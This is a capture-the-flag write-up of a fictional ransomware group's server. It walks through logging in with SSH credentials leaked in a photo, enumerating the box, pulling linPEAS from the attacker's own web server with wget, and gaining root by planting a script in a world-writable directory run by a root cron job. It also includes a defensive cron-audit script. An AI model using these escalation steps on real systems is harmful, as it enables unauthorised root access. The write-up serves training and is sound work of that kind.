Challenge Name:
Nisseware - Infrastructure
Category:
Malware
Challenge Description:
We must help all the victims in the case, but to really make a difference, the root of the problem must be dealt with: N1ss3b4nd3n itself.
We assume they are located at the North Pole, and we have no means of prosecution there, so other measures must be taken: Disruption.
Find the group's server, infiltrate it and see if you can get full root access, so that all victims can have their data decrypted and deleted from the server, and all infrastructure can be taken down.
The challenge builds on the clues found in Nisseware: OSINT - did you find everything? 👀
Note: The challenge was available via Haaukins during the CTF
Approach
Working from our OSINT investigation
This writeup continues on the findings of Nisseware - OSINT, in which there was a very important statement at the end of the description: “fandt du det hele? 👀” (did you find everything?).
In the OSINT challenge we found the social media profiles of HrM0rt3ns3n & N1ss3f4r on Mastodon and infosec.exchange. N1ss3f4r, however, stated the following in his final post:
Translated from Danish, it reads: “It is a slightly confusing platform for such an oldtimer like me, how do you get new followers? Perhaps I should stick to the good old networks, at least I know those.”
This hint is important, since it might indicate that he has additional profiles we didn't uncover with the OSINT tool.
After some investigation, a significant limitation of the tool Sherlock was discovered: it unfortunately does not search some social media sites well, one of which is Instagram! Therefore it is always a good idea to also investigate the well-known SoMe sites yourself, such as Facebook, YouTube, Instagram, Twitter, GitHub, TikTok etc.
Being an oldtimer myself… I do not have an account on Instagram and therefore I didn’t uncover this profile immediately!
A lot of great pictures have been posted on this Instagram profile
Out of all the images, especially this one stands out
If we zoom in on the picture we can see, on the left side of the screen, the development in Visual Studio Code of the VBA script from Nisseware - Phishing. More importantly, on the right side we see an SSH login session (upper right)
and what appears to be an email from HrM0rt3ns3n, which contains SSH credentials!
The text reads (translated from Danish):
Good morning nissefar!
As agreed, I have set up a new C2 server, it should be good to go.
You can connect via SSH to n1ss3b4nd3n.jul with your usual handle and the password:
HyphypAlleMine9R3nsdyr!
I have put a couple of scripts on it for automatically fetching new ransom payments and for wiping logs regularly,
so you don't need to be so nervous about how you use the machine.
We'd rather not end up in the same situation as last time; exciting to see when Sk1pp3r gets out again...
/Hr. M0rt3ns3n
How incredibly lucky! We obtained the password “HyphypAlleMine9R3nsdyr!” for the server “n1ss3b4nd3n.jul”. In the SSH session image we can see n1ss3f4r connecting via SSH to this very server, so we should absolutely try the same!
Enumerating
As always we execute an nmap scan to locate the “n1ss3b4nd3n.jul” server.
┌──(haaukins㉿kali)-[~]
└─$ nmap --open 77.138.111.0/24
Nmap scan report for 77.138.111.41
Host is up (0.00068s latency).
Not shown: 999 closed tcp ports (conn-refused)
PORT STATE SERVICE
22/tcp open ssh
Nmap done: 256 IP addresses (4 hosts up) scanned in 3.31 seconds
We do locate the server and see a single open port, 22 (SSH), which is definitely exhilarating, seeing as we have SSH credentials readily available!
We try to SSH into the server with our credentials and, lo and behold!
┌──(haaukins㉿kali)-[~]
└─$ ssh n1ss3f4r@n1ss3b4nd3n.jul
The authenticity of host 'n1ss3b4nd3n.jul (77.138.111.41)' can't be established.
ED25519 key fingerprint is SHA256:VvS0qdYOC8cg07HhXtpEOXWYOCr/APJAbOpwuQNzEbU.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added 'n1ss3b4nd3n.jul' (ED25519) to the list of known hosts.
n1ss3f4r@n1ss3b4nd3n.jul's password:
Welcome to Ubuntu 22.04.3 LTS (GNU/Linux 5.15.0-88-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
This system has been minimized by removing packages and content that are
not required on a system that users do not log into.
To restore this content, you can run the 'unminimize' command.
The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.
n1ss3f4r@acaeda685ce2:~$
We have a shell as the user on the victim! Let's immediately run some initial enumeration and see what we can find:
n1ss3f4r@acaeda685ce2:~$ whoami
n1ss3f4r
n1ss3f4r@acaeda685ce2:~$ pwd
/home/n1ss3f4r
n1ss3f4r@acaeda685ce2:~$ ls
2023-Q3-regnskab.xlsm flag_user.txt loader.vbs payloads todo.txt
n1ss3f4r@acaeda685ce2:~$ cat flag_user.txt
NC3{N1ss3b4nd3ns_53rv3r
n1ss3f4r@acaeda685ce2:~$
We verify which user we are connected as, see that we landed in his home directory and find a bunch of files in it: the VBA script from Nisseware - Phishing, a payloads folder with content we already used to solve Nisseware - Loading, and half a flag… which is a little disappointing, but indicates that we are very close! There is also a todo.txt, which reads (translated from Danish):
# TODO
- Follow up on the latest attack (Legetøj"Я"Os)
- Monitor ransom transfers
- Go through exfiltrated documents with prototypes, put into production or sell
- Improve script for monitoring new ransom transfers
- Remember dentist appointment
- Prepare the elves for a new round of layoffs
- Find new targets in the toy industry
- Check up on the server's security, it may need some hardening
This contains references back to previous challenges in the Nisseware series, but also a reference to a monitoring script and what appears to be a TODO to check up on the server's security, which might need improving!
This is an important clue, hinting that we should check for vulnerabilities.
In general, when doing a “HackTheBox”-style challenge, in which we go through the stages of hacking, once we get access to “the box” it is a good idea to go through a “checklist” of user rights, and especially to check for super user rights on Linux machines!
n1ss3f4r@acaeda685ce2:~$ whoami && uname -a && sudo -l
n1ss3f4r
Linux acaeda685ce2 5.15.0-88-generic #98-Ubuntu SMP Mon Oct 2 15:18:56 UTC 2023 x86_64 x86_64 x86_64 GNU/Linux
Sorry, user n1ss3f4r may not run sudo on acaeda685ce2.
n1ss3f4r@acaeda685ce2:~$
Here we see the user, the OS architecture, and that the user cannot run any command as super user (unfortunately).
n1ss3f4r@acaeda685ce2:~$ cat /etc/passwd && cat /etc/shadow
root:x:0:0:root:/root:/bin/bash
# -- SYSTEM USERS LEFT OUT FOR BETTER OVERVIEW -- #
n1ss3f4r:x:1000:1000::/home/n1ss3f4r:/bin/bash
cat: /etc/shadow: Permission denied
n1ss3f4r@acaeda685ce2:~$
Here we see all the users on the system, but besides root, the administrative user on Linux systems, there is only a single other real user, n1ss3f4r. We are not allowed to read the /etc/shadow file, which on modern Linux systems is the file that actually holds the hashed user passwords; we could have tried to crack those, had we been able to read them.
n1ss3f4r@acaeda685ce2:~$ find / -type f -perm -04000 -ls 2>/dev/null
5954417 48 -rwsr-xr-x 1 root root 47480 Feb 21 2022 /usr/bin/mount
5954523 36 -rwsr-xr-x 1 root root 35192 Feb 21 2022 /usr/bin/umount
5954422 40 -rwsr-xr-x 1 root root 40496 Nov 24 2022 /usr/bin/newgrp
5954433 60 -rwsr-xr-x 1 root root 59976 Nov 24 2022 /usr/bin/passwd
5954297 44 -rwsr-xr-x 1 root root 44808 Nov 24 2022 /usr/bin/chsh
5954497 56 -rwsr-xr-x 1 root root 55672 Feb 21 2022 /usr/bin/su
5954291 72 -rwsr-xr-x 1 root root 72712 Nov 24 2022 /usr/bin/chfn
5954359 72 -rwsr-xr-x 1 root root 72072 Nov 24 2022 /usr/bin/gpasswd
6454237 228 -rwsr-xr-x 1 root root 232416 Apr 3 2023 /usr/bin/sudo
6454317 332 -rwsr-xr-x 1 root root 338536 Aug 24 13:40 /usr/lib/openssh/ssh-keysign
6454287 36 -rwsr-xr-- 1 root messagebus 35112 Oct 25 2022 /usr/lib/dbus-1.0/dbus-daemon-launch-helper
n1ss3f4r@acaeda685ce2:~$
The intention of this command is to look for SUID binaries, which in certain situations can be used to escalate privileges (PrivEsc). One great site for finding such tricks is GTFOBins. Unfortunately this is also not a viable path forward, as the binaries found are only the standard root-owned ones.
We therefore upload an enumeration script from our attacking machine to the victim, by starting a web server on our Kali machine:
┌──(haaukins㉿kali)-[~]
└─$ python3 -m http.server 1337
Serving HTTP on 0.0.0.0 port 1337 (http://0.0.0.0:1337/) ...
and on the victim we make a wget request to download linPEAS:
n1ss3f4r@acaeda685ce2:~$ wget http://77.138.111.4:1337/linpeas.sh
--2023-12-20 21:25:25-- http://77.138.111.4:1337/linpeas.sh
Connecting to 77.138.111.4:1337... connected.
HTTP request sent, awaiting response... 200 OK
Length: 835306 (816K) [text/x-sh]
Saving to: ‘linpeas.sh’
linpeas.sh 100%[=================================================>] 815.73K --.-KB/s in 0.007s
2023-12-20 21:25:25 (109 MB/s) - ‘linpeas.sh’ saved [835306/835306]
n1ss3f4r@acaeda685ce2:~$ ls
2023-Q3-regnskab.xlsm flag_user.txt linpeas.sh loader.vbs payloads todo.txt
n1ss3f4r@acaeda685ce2:~$ chmod +x linpeas.sh
n1ss3f4r@acaeda685ce2:~$
After downloading the enumeration script and making it executable, we run it and read through the report, in which we see that there is a cron job set up which runs as root! This can be confirmed by running the “top” command in Linux:
PID USER PR NI VIRT RES SHR S %CPU %MEM TIME+ COMMAND
1 root 20 0 2888 956 864 S 0.0 0.0 0:00.04 sh
7 root 20 0 4360 3280 3040 S 0.0 0.0 0:00.00 startup.sh
9 root 20 0 3884 2044 1812 S 0.0 0.0 0:00.00 cron
11 root 20 0 15420 9068 7496 S 0.0 0.0 0:00.01 sshd
25 root 20 0 16712 10568 8676 S 0.0 0.0 0:00.08 sshd
36 n1ss3f4r 20 0 16972 8276 6108 S 0.0 0.0 0:00.07 sshd
37 n1ss3f4r 20 0 5044 4100 3476 S 0.0 0.0 0:00.02 bash
9813 n1ss3f4r 20 0 7736 3588 3024 R 0.0 0.0 0:00.00 top
Curious about which tasks the cron job might be handling, we take a look at /etc/cron.d:
n1ss3f4r@acaeda685ce2:~$ ls /etc/cron.d
e2scrub_all run_scripts
n1ss3f4r@acaeda685ce2:~$ cat /etc/cron.d/run_scripts
*/5 * * * * root /bin/bash /root/run_all.sh /usr/scheduled
n1ss3f4r@acaeda685ce2:~$
There are two jobs available: “e2scrub_all”, a default error-checking job for storage, which is not of huge interest, and “run_scripts”, which appears to be a custom job! The job executes the “/root/run_all.sh” script every 5 minutes as root with the folder “/usr/scheduled” as its argument. Since we can't inspect run_all.sh, as it is located in root's home directory, we instead check out the /usr/scheduled folder.
n1ss3f4r@acaeda685ce2:~$ ls -alh /usr/scheduled/
total 16K
drwxrwxrwx 1 root root 4.0K Nov 29 11:20 .
drwxr-xr-x 1 root root 4.0K Nov 29 11:20 ..
-rwx------ 1 root root 110 Nov 29 11:19 delete_logs.sh
-rwx------ 1 root root 594 Nov 29 11:19 fetch_new_payments.sh
n1ss3f4r@acaeda685ce2:~$ cat /usr/scheduled/delete_logs.sh
cat: /usr/scheduled/delete_logs.sh: Permission denied
n1ss3f4r@acaeda685ce2:~$ cat /usr/scheduled/fetch_new_payments.sh
cat: /usr/scheduled/fetch_new_payments.sh: Permission denied
n1ss3f4r@acaeda685ce2:~$
We find two scripts in this folder: “delete_logs.sh” & “fetch_new_payments.sh”. Both can only be read by root, so we can only guess at their purpose, but knowing that the cron job runs over the entire folder, and that the folder itself is world-writable (drwxrwxrwx), we might be able to add our own script and have it executed as root!
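The defender's counterpart to the check above, added here and not part of the original writeup: a small POSIX shell audit of a cron.d-style file that flags root jobs whose command arguments (or their parent directories) are world-writable, exactly the /usr/scheduled situation. It assumes only a find that supports -H, -prune and -perm -002.

```shell
#!/bin/sh
# Added example, not part of the writeup: audit a cron.d-style file for the
# weakness exploited above, a root job whose arguments point at a directory
# (or file) that any user can write to. Returns 0 if clean, 1 if anything
# was flagged.  Usage: audit_cron_file /etc/cron.d/run_scripts

# True if PATH exists and has the "other" write bit set. find -H follows a
# symlink given on the command line (e.g. /bin -> usr/bin), so the target's
# mode is checked, not the symlink's own 0777.
is_world_writable() {
    [ -e "$1" ] && [ -n "$(find -H "$1" -prune -perm -002 2>/dev/null)" ]
}

# Report PATH and its parent directory if either is world-writable.
# A writable parent is just as bad: the script itself can be replaced.
check_path() {
    _bad=0
    for _p in "$1" "$(dirname "$1")"; do
        if is_world_writable "$_p"; then
            echo "WRITABLE: $_p (used by root job: $2)"
            _bad=1
        fi
    done
    return $_bad
}

# Parse one cron.d file: fields are min hour dom mon dow USER command...
audit_cron_file() {
    _file=$1
    _rc=0
    while IFS= read -r _line || [ -n "$_line" ]; do
        # skip blank lines, comments and NAME=value environment settings
        case "$_line" in '' | \#* | [A-Za-z_]*=*) continue ;; esac
        set -f            # no globbing: '*' and '*/5' are cron fields, not patterns
        set -- $_line
        set +f
        [ $# -ge 7 ] && [ "$6" = root ] || continue
        shift 6           # $@ is now the command and its arguments
        for _arg in "$@"; do
            case "$_arg" in
                /*) check_path "$_arg" "$_line" || _rc=1 ;;
            esac
        done
    done < "$_file"
    return $_rc
}
```

Run against /etc/cron.d/run_scripts on the box above it would print a WRITABLE line for /usr/scheduled; the fix is simply to remove the world-writable bit from that directory.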
From here we could do a plethora of things. In a CTF context the simplest would be to simply read out the flag, which we might guess to be located at /root/flag_root.txt (considering the naming convention of the user flag!).
A better way of securing permanent PrivEsc would be to create a reverse shell attack, which would spawn a shell on our attacking machine as the root user on the victim.
Seeing as this is CTF and time matters for points, we simply create a script to copy the root flag to a directory we can read from!
#!/bin/bash
cp /root/flag_root.txt /home/n1ss3f4r/
n1ss3f4r@acaeda685ce2:~$ vim /usr/scheduled/pwn.sh
n1ss3f4r@acaeda685ce2:~$ chmod +x /usr/scheduled/pwn.sh
# -- WAITING FOR 5 agonizing minutes --- #
n1ss3f4r@acaeda685ce2:~$ ls
2023-Q3-regnskab.xlsm flag_root.txt flag_user.txt linpeas.sh loader.vbs payloads todo.txt
We use the best text editor known to man and create our new script, which copies flag_root.txt to our home directory! After this there is nothing to do but wait 5 minutes for the cron job to execute and see if we managed to solve the challenge…
And after 5 minutes we see that a new file has been created in our home directory, which allows us to read the second half of the flag!
n1ss3f4r@acaeda685ce2:~$ cat flag_user.txt flag_root.txt
NC3{N1ss3b4nd3ns_53rv3r
_1nf1ltr3r3t_g00d_j0b!}
n1ss3f4r@acaeda685ce2:~$ echo "$(cat flag_user.txt)$(cat flag_root.txt)"
NC3{N1ss3b4nd3ns_53rv3r_1nf1ltr3r3t_g00d_j0b!}
n1ss3f4r@acaeda685ce2:~$
Flag
NC3{N1ss3b4nd3ns_53rv3r_1nf1ltr3r3t_g00d_j0b!}
Reflections and Learnings
The Power of OSINT and Attention to Detail
This challenge was a powerful reminder of the critical role of Open Source Intelligence (OSINT) in cybersecurity. The initial clue from N1ss3f4r’s Instagram account was pivotal. It underscores the importance of thorough investigation and considering even seemingly minor details - what might initially appear as an innocuous social media post can, in fact, be a treasure trove of information.
The Necessity of Understanding and Leveraging System Configurations
Thorough enumeration of the current step in the challenge is essential to move on! The discovery of the cron job running as root highlighted the importance of understanding system configurations and how they can be manipulated for privilege escalation. The ability to recognize and exploit such configurations is a vital skill in cybersecurity.